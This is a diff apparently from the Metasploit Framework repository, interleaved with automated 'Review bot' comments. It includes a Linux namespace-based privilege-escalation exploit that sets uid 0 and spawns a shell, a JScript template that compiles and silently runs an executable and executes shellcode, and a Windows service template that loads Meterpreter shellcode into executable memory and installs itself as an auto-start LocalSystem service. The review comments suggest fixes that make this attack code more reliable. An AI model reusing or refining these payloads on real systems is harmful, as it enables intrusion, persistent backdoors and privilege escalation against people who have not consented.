int bytes_read = 0;
|
||||
while (1) {
|
||||
int bytes_to_read = CHUNK_SIZE;
|
||||
if (bytes_to_read > max_length - bytes_read)
|
||||
bytes_to_read = max_length - bytes_read;
|
||||
int rv = read(f, &buffer[bytes_read], bytes_to_read);
|
||||
if (rv == -1)
|
||||
return -1;
|
||||
bytes_read += rv;
|
||||
if (rv == 0)
|
||||
return bytes_read;
|
||||
}
|
||||
}
|
||||
|
||||
static int write_file(const char* file, const char* what, ...) {
|
||||
char buf[1024];
|
||||
va_list args;
|
||||
va_start(args, what);
|
||||
vsnprintf(buf, sizeof(buf), what, args);
|
||||
va_end(args);
|
||||
buf[sizeof(buf) - 1] = 0;
|
||||
int len = strlen(buf);
|
||||
|
||||
int fd = open(file, O_WRONLY | O_CLOEXEC);
|
||||
if (fd == -1)
|
||||
return -1;
|
||||
if (write(fd, buf, len) != len) {
|
||||
close(fd);
|
||||
return -1;
|
||||
}
|
||||
close(fd);
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * Map * * * * * * * * * * * * * * * * *
|
||||
|
||||
int get_subuid(char* output, int max_length) {
|
||||
char buffer[1024];
|
||||
char* path = "/etc/subuid";
|
||||
int length = read_file(path, &buffer[0], sizeof(buffer));
|
||||
if (length == -1)
|
||||
return -1;
|
||||
|
||||
int real_uid = getuid();
|
||||
struct passwd *u = getpwuid(real_uid);
|
||||
|
||||
char needle[1024];
|
||||
sprintf(needle, "%s:", u->pw_name);
|
||||
int needle_length = strlen(needle);
|
||||
char* found = memmem(&buffer[0], length, needle, needle_length);
|
||||
if (found == NULL)
|
||||
return -1;
|
||||
|
||||
int i;
|
||||
for (i = 0; found[needle_length + i] != ':'; i++) {
|
||||
if (i >= max_length)
|
||||
return -1;
|
||||
if ((found - &buffer[0]) + needle_length + i >= length)
|
||||
return -1;
|
||||
output[i] = found[needle_length + i];
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int get_subgid(char* output, int max_length) {
|
||||
char buffer[1024];
|
||||
char* path = "/etc/subgid";
|
||||
int length = read_file(path, &buffer[0], sizeof(buffer));
|
||||
if (length == -1)
|
||||
return -1;
|
||||
|
||||
int real_gid = getgid();
|
||||
struct group *g = getgrgid(real_gid);
|
||||
|
||||
char needle[1024];
|
||||
sprintf(needle, "%s:", g->gr_name);
|
||||
int needle_length = strlen(needle);
|
||||
char* found = memmem(&buffer[0], length, needle, needle_length);
|
||||
if (found == NULL)
|
||||
return -1;
|
||||
|
||||
int i;
|
||||
for (i = 0; found[needle_length + i] != ':'; i++) {
|
||||
if (i >= max_length)
|
||||
return -1;
|
||||
if ((found - &buffer[0]) + needle_length + i >= length)
|
||||
return -1;
|
||||
output[i] = found[needle_length + i];
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
|
||||
|
||||
int main(int argc, char** argv) {
|
||||
if (argc > 1) SUBSHELL = argv[1];
|
||||
|
||||
dprintf("[.] starting\n");
|
||||
|
||||
dprintf("[.] setting up namespace\n");
|
||||
|
||||
int sync_pipe[2];
|
||||
char dummy;
|
||||
|
||||
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) {
|
||||
dprintf("[-] pipe\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
pid_t child = fork();
|
||||
|
||||
if (child == -1) {
|
||||
dprintf("[-] fork");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (child == 0) {
|
||||
prctl(PR_SET_PDEATHSIG, SIGKILL);
|
||||
close(sync_pipe[1]);
|
||||
|
||||
if (unshare(CLONE_NEWUSER) != 0) {
|
||||
dprintf("[-] unshare(CLONE_NEWUSER)\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (unshare(CLONE_NEWNET) != 0) {
|
||||
dprintf("[-] unshare(CLONE_NEWNET)\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (write(sync_pipe[0], "X", 1) != 1) {
|
||||
dprintf("write to sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (read(sync_pipe[0], &dummy, 1) != 1) {
|
||||
dprintf("[-] read from sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (setgid(0)) {
|
||||
dprintf("[-] setgid");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (setuid(0)) {
|
||||
printf("[-] setuid");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
execl(SUBSHELL, "", NULL);
|
||||
|
||||
dprintf("[-] executing subshell failed\n");
|
||||
}
|
||||
|
||||
close(sync_pipe[0]);
|
||||
|
||||
if (read(sync_pipe[1], &dummy, 1) != 1) {
|
||||
dprintf("[-] read from sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
char path[256];
|
||||
sprintf(path, "/proc/%d/setgroups", (int)child);
|
||||
|
||||
if (write_file(path, "deny") == -1) {
|
||||
dprintf("[-] denying setgroups failed\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[~] done, namespace sandbox set up\n");
|
||||
|
||||
dprintf("[.] mapping subordinate ids\n");
|
||||
char subuid[64];
|
||||
char subgid[64];
|
||||
|
||||
if (get_subuid(&subuid[0], sizeof(subuid))) {
|
||||
dprintf("[-] couldn't find subuid map in /etc/subuid\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (get_subgid(&subgid[0], sizeof(subgid))) {
|
||||
dprintf("[-] couldn't find subgid map in /etc/subgid\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[.] subuid: %s\n", subuid);
|
||||
dprintf("[.] subgid: %s\n", subgid);
|
||||
|
||||
char cmd[256];
|
||||
|
||||
sprintf(cmd, "newuidmap %d 0 %s 1000", (int)child, subuid);
|
||||
if (system(cmd)) {
|
||||
dprintf("[-] newuidmap failed");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
sprintf(cmd, "newgidmap %d 0 %s 1000", (int)child, subgid);
|
||||
if (system(cmd)) {
|
||||
dprintf("[-] newgidmap failed");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[~] done, mapped subordinate ids\n");
|
||||
|
||||
dprintf("[.] executing subshell\n");
|
||||
|
||||
if (write(sync_pipe[1], "X", 1) != 1) {
|
||||
dprintf("[-] write to sock");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
int status;
|
||||
if (wait(&status) != child) {
|
||||
dprintf("[-] wait");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
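Review bot: `get_subuid` and `get_subgid` never NUL-terminate `output`: the loop copies the characters up to the next `:` but stops there, and the caller's `char subuid[64];` / `char subgid[64];` are uninitialised stack buffers, so the later `dprintf("[.] subuid: %s\n", subuid)` and `sprintf(cmd, "newuidmap %d 0 %s 1000", ...)` may read past the copied digits into garbage. Add `output[i] = '\0';` after the loop and tighten the bound check to `i >= max_length - 1` so the terminator always fits. The two functions are otherwise identical apart from the path and the name lookup; a single helper taking the path and the name would halve the code and keep the fix in one place.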
|
@ -72,5 +72,6 @@ function ShellCodeExec()
|
|||
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
||||
|
||||
}
|
||||
|
||||
try{
|
||||
ShellCodeExec();
|
||||
}catch(e){}
|
||||
|
|
|
@ -141,8 +141,9 @@
|
|||
var objShell = new ActiveXObject("WScript.shell");
|
||||
var js_f = path + "\\\\<%= fname %>.js";
|
||||
var ex = path + "\\\\<%= fname %>.exe";
|
||||
var platform = "/platform:<%= arch %>";
|
||||
|
||||
objShell.run(comPath + " /out:" + ex + " " + js_f);
|
||||
objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
|
||||
while(!fso.FileExists(ex)) { }
|
||||
|
||||
objShell.run(ex, 0);
|
||||
|
|
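Review bot: `objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0)` returns immediately, so the `while(!fso.FileExists(ex)) { }` busy-wait is the only synchronisation; if the compiler exits with an error the output file never appears and the script spins at full CPU forever. Passing `true` as the third argument (`bWaitOnReturn`) makes `Run` block until the compiler exits and hand back its exit code, so the loop can be dropped and a non-zero code handled instead.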
|
@ -0,0 +1,304 @@
|
|||
#include <String.h>
|
||||
#include <Windows.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define SERVICE_NAME <%= @service_name.inspect %>
|
||||
#define DISPLAY_NAME <%= @service_description.inspect %>
|
||||
#define RETRY_TIME <%= @retry_time %>
|
||||
|
||||
//
|
||||
// Globals
|
||||
//
|
||||
|
||||
SERVICE_STATUS status;
|
||||
SERVICE_STATUS_HANDLE hStatus;
|
||||
|
||||
//
|
||||
// Meterpreter connect back to host
|
||||
//
|
||||
|
||||
void start_meterpreter()
|
||||
{
|
||||
// Your meterpreter shell here
|
||||
<%= buf %>
|
||||
|
||||
LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
memcpy(buffer,buf,sizeof(buf));
|
||||
HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
|
||||
WaitForSingleObject(hThread, -1); //INFINITE
|
||||
CloseHandle(hThread);
|
||||
}
|
||||
|
||||
//
|
||||
// Call self without parameter to start meterpreter
|
||||
//
|
||||
|
||||
void self_call()
|
||||
{
|
||||
char path[MAX_PATH];
|
||||
char cmd[MAX_PATH];
|
||||
|
||||
if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
|
||||
// Get module file name failed
|
||||
return;
|
||||
}
|
||||
|
||||
STARTUPINFO startup_info;
|
||||
PROCESS_INFORMATION process_information;
|
||||
|
||||
ZeroMemory(&startup_info, sizeof(startup_info));
|
||||
startup_info.cb = sizeof(startup_info);
|
||||
|
||||
ZeroMemory(&process_information, sizeof(process_information));
|
||||
|
||||
// If create process failed.
|
||||
// CREATE_NO_WINDOW = 0x08000000
|
||||
if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
|
||||
NULL, &startup_info, &process_information) == 0)
|
||||
{
|
||||
return;
|
||||
}
|
||||
|
||||
// Wait until the process died.
|
||||
WaitForSingleObject(process_information.hProcess, -1);
|
||||
}
|
||||
|
||||
//
|
||||
// Process control requests from the Service Control Manager
|
||||
//
|
||||
|
||||
VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
|
||||
{
|
||||
switch (fdwControl) {
|
||||
case SERVICE_CONTROL_STOP:
|
||||
case SERVICE_CONTROL_SHUTDOWN:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_STOPPED;
|
||||
break;
|
||||
|
||||
case SERVICE_CONTROL_PAUSE:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_PAUSED;
|
||||
break;
|
||||
|
||||
case SERVICE_CONTROL_CONTINUE:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_RUNNING;
|
||||
break;
|
||||
|
||||
default:
|
||||
break;
|
||||
}
|
||||
|
||||
if (SetServiceStatus(hStatus, &status) == 0) {
|
||||
//printf("Cannot set service status (0x%08x)", GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Main function of service
|
||||
//
|
||||
|
||||
VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
|
||||
{
|
||||
// Register the service handler
|
||||
|
||||
hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
|
||||
|
||||
if (hStatus == 0) {
|
||||
//printf("Cannot register service handler (0x%08x)", GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Initialize the service status structure
|
||||
|
||||
status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
|
||||
status.dwCurrentState = SERVICE_RUNNING;
|
||||
status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwServiceSpecificExitCode = 0;
|
||||
status.dwCheckPoint = 0;
|
||||
status.dwWaitHint = 0;
|
||||
|
||||
if (SetServiceStatus(hStatus, &status) == 0) {
|
||||
//printf("Cannot set service status (0x%08x)", GetLastError());
|
||||
return;
|
||||
}
|
||||
|
||||
// Start the Meterpreter
|
||||
while (status.dwCurrentState == SERVICE_RUNNING) {
|
||||
self_call();
|
||||
Sleep(RETRY_TIME);
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Installs and starts the Meterpreter service
|
||||
//
|
||||
|
||||
BOOL install_service()
|
||||
{
|
||||
SC_HANDLE hSCManager;
|
||||
SC_HANDLE hService;
|
||||
|
||||
char path[MAX_PATH];
|
||||
|
||||
// Get the current module name
|
||||
|
||||
if (!GetModuleFileName(NULL, path, MAX_PATH)) {
|
||||
//printf("Cannot get module name (0x%08x)", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Build the service command line
|
||||
|
||||
|
||||
char cmd[MAX_PATH];
|
||||
|
||||
int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
|
||||
if (total_len < 0 || total_len >= sizeof(cmd)){
|
||||
//printf("Cannot build service command line (0x%08x)", -1);
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
cmd[0] = '\0';
|
||||
strcat(cmd, "\"");
|
||||
strcat(cmd, path);
|
||||
strcat(cmd, "\" <%= @start_cmd %>");
|
||||
|
||||
// Open the service manager
|
||||
|
||||
hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
|
||||
|
||||
if (hSCManager == NULL) {
|
||||
//printf("Cannot open service manager (0x%08x)", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Create the service
|
||||
|
||||
hService = CreateService(
|
||||
hSCManager,
|
||||
SERVICE_NAME,
|
||||
DISPLAY_NAME,
|
||||
0xf01ff, // SERVICE_ALL_ACCESS
|
||||
SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
|
||||
SERVICE_AUTO_START,
|
||||
SERVICE_ERROR_NORMAL,
|
||||
cmd,
|
||||
NULL,
|
||||
NULL,
|
||||
NULL,
|
||||
NULL, /* LocalSystem account */
|
||||
NULL
|
||||
);
|
||||
|
||||
if (hService == NULL) {
|
||||
//printf("Cannot create service (0x%08x)", GetLastError());
|
||||
|
||||
CloseServiceHandle(hSCManager);
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Start the service
|
||||
|
||||
char* args[] = { path, "service" };
|
||||
|
||||
if (StartService(hService, 2, (const char**)&args) == 0) {
|
||||
DWORD err = GetLastError();
|
||||
|
||||
if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
|
||||
{
|
||||
//printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
|
||||
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCManager);
|
||||
return FALSE;
|
||||
}
|
||||
}
|
||||
|
||||
// Cleanup
|
||||
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCManager);
|
||||
|
||||
//printf("Service %s successfully installed.", SERVICE_NAME);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
//
|
||||
// Start the service
|
||||
//
|
||||
|
||||
void start_service()
|
||||
{
|
||||
SERVICE_TABLE_ENTRY ServiceTable[] =
|
||||
{
|
||||
{ SERVICE_NAME, &ServiceMain },
|
||||
{ NULL, NULL }
|
||||
};
|
||||
|
||||
if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
|
||||
//printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Main function
|
||||
//
|
||||
|
||||
int main()
|
||||
{
|
||||
// Parse the command line argument.
|
||||
// For now, int main(int argc, char *argv) is buggy with metasm.
|
||||
// So we choose this approach to achieve it.
|
||||
LPTSTR cmdline;
|
||||
cmdline = GetCommandLine();
|
||||
|
||||
char *argv[MAX_PATH];
|
||||
char * ch = strtok(cmdline," ");
|
||||
int argc = 0;
|
||||
|
||||
while (ch != NULL)
|
||||
{
|
||||
argv[argc] = malloc( strlen(ch)+1) ;
|
||||
strncpy(argv[argc], ch, strlen(ch)+1);
|
||||
|
||||
ch = strtok (NULL, " ");
|
||||
argc++;
|
||||
}
|
||||
|
||||
if (argc > 1) {
|
||||
|
||||
if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
|
||||
|
||||
// Installs and starts the service
|
||||
|
||||
install_service();
|
||||
return 0;
|
||||
}
|
||||
else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
|
||||
// Starts the Meterpreter as a service
|
||||
|
||||
start_service();
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
|
||||
// Starts the Meterpreter as a normal application
|
||||
|
||||
start_meterpreter();
|
||||
|
||||
return 0;
|
||||
}
|
|
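Review bot: `main()` tokenises the command line into `char *argv[MAX_PATH]` without ever checking `argc` against that bound, so a command line with more than `MAX_PATH` space-separated tokens writes past the array; either stop at `MAX_PATH - 1` tokens or keep only the last token, which is all the code ever compares. Smaller points: `StartService(hService, 2, (const char**)&args)` takes the address of the array and then casts it away, where plain `args` is already the `LPCSTR*` the call wants; the `"service"` literal in that same call is hard-coded while the rest of the file uses `<%= @start_cmd %>`; and `#include <String.h>` should be lower-case `<string.h>` so the template also builds from a case-sensitive filesystem.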
@ -252,6 +252,16 @@ typedef struct _OVERLAPPED {
|
|||
} OVERLAPPED, *LPOVERLAPPED;
|
||||
|
||||
typedef DWORD SERVICE_STATUS_HANDLE;
|
||||
typedef VOID(WINAPI *LPHANDLER_FUNCTION)(DWORD);
|
||||
|
||||
typedef void (WINAPI *LPSERVICE_MAIN_FUNCTION)(DWORD,LPSTR*);
|
||||
|
||||
typedef struct _SERVICE_TABLE_ENTRY {
|
||||
LPSTR lpServiceName;
|
||||
LPSERVICE_MAIN_FUNCTION lpServiceProc;
|
||||
} SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
|
||||
|
||||
typedef SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
|
||||
|
||||
typedef enum _SC_ENUM_TYPE {
|
||||
SC_ENUM_PROCESS_INFO = 0
|
||||
|
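Review bot: `typedef SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;` redeclares the two names that the `struct _SERVICE_TABLE_ENTRY` typedef two lines above already defines; repeating a typedef of the same type is only legal from C11 onward and is redundant in any case, so drop the line.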
@ -540,3 +550,6 @@ WINAPI BOOL IsDebuggerPresent __attribute__((dllimport))(void);
|
|||
WINAPI BOOL CheckRemoteDebuggerPresent __attribute__((dllimport))(HANDLE, PBOOL);
|
||||
WINAPI NTSTATUS NtQueryInformationProcess __attribute__((dllimport))(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
|
||||
WINAPI void SetLastError __attribute__((dllimport))(DWORD);
|
||||
WINAPI SERVICE_STATUS_HANDLE RegisterServiceCtrlHandler __attribute__((dllimport))(LPCSTR, LPHANDLER_FUNCTION);
|
||||
BOOL WINAPI StartServiceCtrlDispatcher __attribute__((dllimport))(LPSERVICE_TABLE_ENTRY);
|
||||
LPTSTR WINAPI GetCommandLine __attribute__((dllimport))(void);
|
||||
|
|
|
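Review bot: `BOOL WINAPI StartServiceCtrlDispatcher ...` and `LPTSTR WINAPI GetCommandLine ...` put the calling convention after the return type, while the surrounding declarations (and `RegisterServiceCtrlHandler` in this same hunk) use `WINAPI <type> <name>`; keep one order so metasm parses them consistently. `GetCommandLine` is also declared as returning `LPTSTR`, which depends on whether `UNICODE` is defined; since the caller hands the result straight to `strtok`, declaring it as `LPSTR` (the `GetCommandLineA` behaviour) makes the narrow-string assumption explicit.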
@ -44,3 +44,5 @@ int system(const char*);
|
|||
long int labs(long int);
|
||||
div_t div(int, int);
|
||||
ldiv_t ldiv(long int, long int);
|
||||
void* malloc (size_t size);
|
||||
|
||||
|
|
|
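Review bot: `malloc` is declared here but `free` is not added alongside it, so the service template that needs `malloc` allocates one buffer per `argv` entry and has no declared way to release them. Add `void free(void*);` next to `malloc` unless it is already declared elsewhere in this header.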
@ -22,4 +22,4 @@ xMMMMMMMMMd ,0MMMMMMMMMMK;
|
|||
%red 'oOWMMMMMMMMo%clr +:+
|
||||
%red .,cdkO0K;%clr :+: :+:
|
||||
:::::::+:
|
||||
%whiMetasploit%clr %yelUnder Construction%clr
|
||||
%whiMetasploit%clr
|
Binary file not shown.
File diff suppressed because it is too large
|
@ -16,6 +16,7 @@ bin
|
|||
checkfs
|
||||
checkfsys
|
||||
checksys
|
||||
chronos
|
||||
cmwlogin
|
||||
couchdb
|
||||
daemon
|
||||
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because it is too large
|
@ -9,6 +9,6 @@ services:
|
|||
BUNDLER_ARGS: --jobs=8
|
||||
image: metasploit:dev
|
||||
environment:
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf_dev
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf_dev?pool=200&timeout=5
|
||||
volumes:
|
||||
- .:/usr/src/metasploit-framework
|
||||
|
|
|
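Review bot: `timeout=5` carries no unit, and for the PostgreSQL adapter ActiveRecord's pool wait setting is `checkout_timeout` (in seconds), so confirm that a `timeout` key in the URL is actually honoured rather than silently discarded. `pool=200` only helps if the database server accepts that many connections, and the same URL is duplicated in `docker-compose.yml` further down this diff; a comment on why 200 was chosen gives the next person who tunes it one place to look.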
@ -3,14 +3,13 @@ services:
|
|||
ms:
|
||||
image: metasploitframework/metasploit-framework:latest
|
||||
environment:
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf?pool=200&timeout=5
|
||||
links:
|
||||
- db
|
||||
ports:
|
||||
- 4444:4444
|
||||
volumes:
|
||||
- $HOME/.msf4:/home/msf/.msf4
|
||||
- /etc/localtime:/etc/localtime:ro
|
||||
|
||||
db:
|
||||
image: postgres:10-alpine
|
||||
|
|
|
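Review bot: `pool=200` exceeds the default `max_connections` (100) of the `postgres:10-alpine` image declared as the `db` service in this same file, so once the framework opens more than about 100 connections the pool will hand out connections that fail with "too many clients". Either raise the server limit on the `db` service (for example `command: postgres -c max_connections=200`) or lower the pool to match.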
@ -0,0 +1,5 @@
|
|||
development: &pgsql
|
||||
url: <%= ENV['DATABASE_URL'] %>
|
||||
|
||||
production: &production
|
||||
<<: *pgsql
|
|
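Review bot: `url: <%= ENV['DATABASE_URL'] %>` evaluates to an empty string when the variable is unset, which surfaces as a confusing adapter error at boot rather than a clear message; `<%= ENV.fetch('DATABASE_URL') %>` fails fast with the variable name. There is also no `test:` section, so the container cannot run the spec suite against this file, and the `&production` anchor is never referenced and can go.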
@ -5,16 +5,27 @@ MSF_GROUP=msf
|
|||
TMP=${MSF_UID:=1000}
|
||||
TMP=${MSF_GID:=1000}
|
||||
|
||||
# don't recreate system users like root
|
||||
if [ "$MSF_UID" -lt "1000" ]; then
|
||||
MSF_UID=1000
|
||||
# if the user starts the container as root or another system user,
|
||||
# don't use a low privileged user as we mount the home directory
|
||||
if [ "$MSF_UID" -eq "0" ]; then
|
||||
"$@"
|
||||
else
|
||||
# if the users group already exists, create a random GID, otherwise
|
||||
# reuse it
|
||||
if ! grep ":$MSF_GID:" /etc/group > /dev/null; then
|
||||
addgroup -g $MSF_GID $MSF_GROUP
|
||||
else
|
||||
addgroup $MSF_GROUP
|
||||
fi
|
||||
|
||||
# check if user id already exists
|
||||
if ! grep ":$MSF_UID:" /etc/passwd > /dev/null; then
|
||||
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
|
||||
# add user to metasploit group so it can read the source
|
||||
addgroup $MSF_USER $METASPLOIT_GROUP
|
||||
su-exec $MSF_USER "$@"
|
||||
# fall back to root exec if the user id already exists
|
||||
else
|
||||
"$@"
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ "$MSF_GID" -lt "1000" ]; then
|
||||
MSF_GID=1000
|
||||
fi
|
||||
|
||||
addgroup -g $MSF_GID $MSF_GROUP
|
||||
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
|
||||
|
||||
su-exec $MSF_USER "$@"
|
||||
|
|
|
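Review bot: the `else` branch under `# fall back to root exec if the user id already exists` runs the command as root whenever `grep ":$MSF_UID:" /etc/passwd` matches, which silently defeats the low-privilege path, and the unanchored pattern also matches the GID field of `/etc/passwd` (`name:x:uid:gid:...`), so an existing account whose primary group is `$MSF_UID` triggers the root fallback even though the UID itself is free. Resolve the owning account instead of dropping to root, e.g. `existing=$(awk -F: -v u="$MSF_UID" '$3==u{print $1}' /etc/passwd)` followed by `su-exec "$existing" "$@"`, and use the same field-exact `awk` test for the `/etc/group` check in place of `grep ":$MSF_GID:"`. `METASPLOIT_GROUP`, used by `addgroup $MSF_USER $METASPLOIT_GROUP`, is not set anywhere in this hunk; confirm the Dockerfile exports it. The comment "if the users group already exists, create a random GID, otherwise reuse it" also reads backwards relative to the `if ! grep` that follows; "reuse the requested GID if it is free, otherwise let addgroup pick one" matches the code.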
@ -15,26 +15,21 @@ module AuthApiDoc
|
|||
end
|
||||
|
||||
swagger_path '/api/v1/auth/generate-token' do
|
||||
# Swagger documentation for /api/v1/auth/generate-token GET
|
||||
operation :get do
|
||||
# Swagger documentation for /api/v1/auth/generate-token POST
|
||||
operation :post do
|
||||
|
||||
key :description, 'Return a valid Authorization Bearer token.'
|
||||
key :tags, [ 'auth' ]
|
||||
|
||||
parameter do
|
||||
key :name, :username
|
||||
key :in, :query
|
||||
key :description, 'The username for the user you want to authenticate.'
|
||||
key :in, :body
|
||||
key :name, :body
|
||||
key :description, 'Login credentials for the user who will be generating a token.'
|
||||
key :required, true
|
||||
key :type, :string
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :password
|
||||
key :in, :query
|
||||
key :description, 'The password for the user you want to authenticate.'
|
||||
key :required, true
|
||||
key :type, :string
|
||||
schema do
|
||||
property :username, type: :string, required: true
|
||||
property :password, type: :string, required: true
|
||||
end
|
||||
end
|
||||
|
||||
response 200 do
|
||||
|
|
|
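Review bot: `property :username, type: :string, required: true` puts `required` on each property, but Swagger 2.0 expresses required fields as an array on the schema object, which is the form this same diff uses for `swagger_schema :Realm` (`key :required, [:key, :value]`); use `key :required, [:username, :password]` inside the body `schema` so generated clients actually enforce it. Moving the credentials from query parameters into a POST body is the right call, since query strings end up in access logs and browser history, and the operation description could say so.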
@ -33,6 +33,11 @@ module CredentialApiDoc
|
|||
DATA_EXAMPLE = "'password123', '$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1', or '$NT$7f8fe03093cc84b267b109625f6bbf4b'"
|
||||
JTR_FORMAT_DESC = 'Comma-separated list of the formats for John the ripper to use to try and crack this.'
|
||||
JTR_FORMAT_EXAMPLE = 'md5,des,bsdi,crypt'
|
||||
KEY_DESC = 'The name of the key for the realm.'
|
||||
KEY_EXAMPLE = 'Active Directory Domain'
|
||||
VALUE_DESC = 'The value of the key for the realm.'
|
||||
VALUE_EXAMPLE = 'contoso.com'
|
||||
|
||||
PUBLIC_TYPE_ENUM = [ 'Metasploit::Credential::BlankUsername', 'Metasploit::Credential::Username' ]
|
||||
PRIVATE_TYPE_CLASS_ENUM = [
|
||||
'Metasploit::Credential::ReplayableHash',
|
||||
|
@ -108,6 +113,15 @@ module CredentialApiDoc
|
|||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
swagger_schema :Realm do
|
||||
key :required, [:key, :value]
|
||||
property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
|
||||
property :key, type: :string, description: KEY_DESC, example: KEY_EXAMPLE
|
||||
property :value, type: :string, description: VALUE_DESC, example: VALUE_EXAMPLE
|
||||
property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
|
||||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
swagger_path '/api/v1/credentials' do
|
||||
# Swagger documentation for /api/v1/credentials GET
|
||||
operation :get do
|
||||
|
@ -197,6 +211,8 @@ module CredentialApiDoc
|
|||
property :username, type: :string, description: USERNAME_DESC, example: USERNAME_EXAMPLE
|
||||
property :private_data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
|
||||
property :private_type, type: :string, description: PRIVATE_TYPE_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :realm_key, type: :string, description: KEY_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :realm_value, type: :string, description: VALUE_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :jtr_format, type: :string, description: JTR_FORMAT_DESC, example: JTR_FORMAT_EXAMPLE
|
||||
property :address, type: :string, format: :ipv4, required: true, description: ADDRESS_DESC, example: ADDRESS_EXAMPLE
|
||||
property :port, type: :int32, format: :int32, description: PORT_DESC, example: PORT_EXAMPLE
|
||||
|
